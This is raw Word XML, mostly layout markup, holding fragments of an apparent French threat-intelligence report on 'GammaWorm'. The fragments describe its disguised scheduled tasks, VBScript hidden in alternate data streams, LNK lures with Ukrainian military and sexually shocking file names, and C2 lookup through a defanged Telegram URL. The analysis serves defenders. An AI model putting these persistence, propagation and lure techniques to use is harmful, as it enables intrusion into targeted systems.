            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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58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76"/>
                          </w:rPr>
                          <w:t xml:space="preserve">списання військового майна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468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720089"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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7200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72008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720089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7200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67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2446029</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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523875">
                          <a:moveTo>
                            <a:pt x="2852420" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2852420" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2852420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2851785" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2851785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720089"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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7200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72008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720089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7200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980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2446029</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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523875">
                          <a:moveTo>
                            <a:pt x="2852420" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2852420" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2852420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2851785" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2851785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2446029</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5767070" cy="5313680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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5313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5313680">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="5313680"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="5310505"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="5310505"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4956175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="4956175"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4601845"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="4601845"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4247515"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="4247515"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3893185"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="3893185"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3538855"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="3538855"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3184525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="3184525"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2830195"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="2830195"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2299335"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="2299335"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1945005"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1945005"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1590675"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1590675"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1236345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1236345"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="882015"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="882015"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="527685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="527685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576707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9264" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3752850</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2452379</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5300980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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3009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300980">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="530098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0288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2446029</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5313680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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3136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313680">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="531368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643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294630" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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463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94630" h="199389">
                          <a:moveTo>
                            <a:pt x="5293994" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5293994" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2966720" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5294630" y="63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2491105" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2491105" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="249174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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3867785</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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155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257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360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976218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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MicrosoftUpdateTaskMachineCore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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="15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MicrosoftUpdateTaskMachineUA</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="28"/>
                          </w:rPr>
                          <w:t xml:space="preserve">. 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4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1172868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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tâches sont configurées pour démarrer peu après l'installation, puis se répéter toutes les 9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5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1346223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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minutes. Dans certains cas, le script utilise même une boucle infinie pour relancer en continu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6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1519578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1292997" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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scripts déployés.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7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1794533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Les deux fichiers leurres LNK utilisent une technique d’ingénierie sociale basée sur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1967888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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noms de fichiers ukrainiens. La liste des noms de fichiers codés en dur et leur traduction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9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2141243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2488829" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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88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automatique en anglais est la suivante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0768" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4051935</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2457473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2387483" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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74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Traduction automatique en anglais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1792" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1089660</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2543833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2510250" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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02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de fichier codé en dur pour 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2816" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4389120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2630828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1673145" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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314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(révisée par un analyste)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384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2975875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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бланк шапка.doc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4864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2983253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1238677" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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86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letterhead form.doc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58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3330205</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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карта обліку.doc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6912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3337583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1285895" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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58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accounting card.doc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79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3684535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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26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проект листа.doc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0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3691913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="928403" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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84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draft letter.doc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99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4038865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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відрядження.doc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1008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4046243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1021723" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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17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deployment.doc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20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4393195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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рнбо.doc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3056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4400573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="579432" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4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rnbo.doc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40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4924055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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загиблих.doc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5104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4930163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="905353" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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53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deceased.doc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61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5278385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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відомость роздавальна.doc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7152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5285763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1355606" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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56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distribution sheet.doc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81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5632715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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таємно.doc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0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5640093</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="680016" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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00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secret.doc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02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5987045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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116_1_914 дск.doc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1248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5994423</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1255022" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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502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116_1_914 dsk.doc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22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6341375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2259158" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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фото військовополоненого.jpeg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3296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6348753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1650254" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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02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prisoner of war photo.jpeg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43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6695705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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фото сперма в жопе.jpeg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5344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6703083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1518377" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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83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photo sperm in ass.jpeg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63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7050035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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згвалтування.jpeg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7392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7057413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="618290" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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2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rape.jpeg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84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7404365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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порно-фото.jpeg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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3789045</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7411743</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013921" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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porn-photo.jpeg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046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1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148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1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251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1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35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1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456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1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405824" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2059939</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6543049</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3831590" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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3159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31590" h="199390">
                          <a:moveTo>
                            <a:pt x="3830955" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3830955" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1584960" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3831590" y="634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855345" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="855345" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="85598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708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6543049</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3849370" cy="747398"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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49370" cy="7473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49370" h="747395">
                          <a:moveTo>
                            <a:pt x="0" y="747395"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2246630" y="747395"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="731519"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="532130"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3063875" y="532130"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3063875" y="731519"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="532765"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3064509" y="532765"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2994025" y="515620"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2994025" y="316230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3848734" y="316230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3848734" y="515620"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2993390" y="316865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3849370" y="316865"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2745105" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="274510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18112" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3146425</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7289809</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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0160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7289809</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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1184" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>909319</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1750057</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="4532007"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="198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18">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="0" r="0" t="-13" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="4532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20" h="4532007">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="4532007"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4532007"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="576072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220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1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323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1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4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1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Cette liste contient des mots choquants destinés à attirer l'attention de l'utilisateur et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5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19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l'inciter à ouvrir ces fichiers. Pour résumer le fonctionnement de ce module de propagation,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6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5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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voici un graphique illustrant l'état d'un lecteur USB ou d'un lecteur réseau avant et après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7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1480843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="690750" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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7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l'infection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8352" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1282065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6258580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5033806" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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380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12 – Exemple d’état d’un lecteur USB ou réseau avant et après l’infection par GammaWorm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9376" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2079624</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6528023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3826395" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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39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SmartRetry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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> : clone de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DiskDiagnosticDataCollector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6500098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1196019" cy="190271"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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6019" cy="19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9" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle44"/>
                            <w:spacing w:val="6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.3.2.2.3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Tâches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1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6844888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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Enfin, une troisième tâche planifiée, nommée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SmartRetry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, est créée dans le répertoire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244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7060153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3164585" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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458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\InstallService\ScanForUpdatesServer\.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3472" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4047490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7061858</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2660221" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19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02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 Cette tâche est un clone de la tâche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449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7275418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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DiskDiagnosticDataCollector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. Elle s’exécute toutes les 10 minutes et exécute le code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5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7469135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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VBScript stocké dans le fichier ADS </w:t>
                        </w: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C:\Users\[USER]:SERVER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, qui est un clone complet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6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7648840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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du fichier ADS </w:t>
                        </w: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C:\Users\[USER]:URL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analysé précédemment et qui récupère et stocke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7831478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2783177" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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831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configuration du serveur C2 dans le registre.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8592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8101355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3105933" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5933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4.3.3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Une porte dérobée au sein du ver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9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8413773</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Après son installation et sa propagation, GammaWorm entre dans une boucle d’exécution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8587128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3621377" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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13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infinie pour établir la communication avec son serveur C2.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1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8862083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Pour résoudre son C2, GammaWorm utilise une nouvelle fois une technique DDR. Il lance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2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9033733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">une requête GET via</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="15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curl</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="31"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> vers un canal Telegram public codé en dur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3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9209035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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hxxps://www.telegram[.]me/s/oberfarir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. L’accès à ce canal ne nécessite ni compte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4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9391673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1518053" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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80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Telegram ni application.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57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678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78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883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985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450880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3844934</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="347980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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3479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347980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347980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="34798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3168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3845569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="347345"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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3473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347345">
                          <a:moveTo>
                            <a:pt x="3174" y="34734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347345"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="347345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="344170"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="344170"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="344170"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="344170"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="34734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7264" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3811905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7833369</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="854713" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
